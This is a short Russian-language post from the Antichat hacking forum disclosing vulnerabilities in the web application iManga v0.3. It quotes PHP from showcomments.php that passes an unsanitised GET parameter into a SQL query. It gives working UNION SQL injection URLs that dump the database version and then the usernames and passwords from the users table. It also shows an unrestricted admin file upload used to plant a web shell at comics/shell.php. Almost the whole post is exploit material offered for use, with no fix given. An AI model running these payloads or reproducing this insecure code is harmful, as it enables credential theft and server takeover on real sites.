31.10.2009, 09:44
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
iManga_v0.3
SQL
Файл showcomments.php
PHP код:
$postid = $_GET['postid'];
$post = mysql_query("SELECT * FROM `" . $global['prefix'] . "news` WHERE id=" . $postid);
$post = mysql_fetch_array($post);
http://localhost/iManga_v0.3/upload/showcomments.php?postid=-1+union+select+1,version(),3,4,5--
http://localhost/iManga_v0.3/upload/showcomments.php?postid=-1+union+select+1,concat_Ws(0x3a,username,password) ,3,4,5+from+users--
ЗАливка шелла
в админке http://localhost/iManga_v0.3/upload/admin/postcomic.php
PHP код:
$target_path = "../comics/" . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $target_path))
{echo "<strong>The comic was successfully uploaded.</strong>\n<br /><br />";
http://localhost/iManga_v0.3/upload/comics/shell.php
|
|
|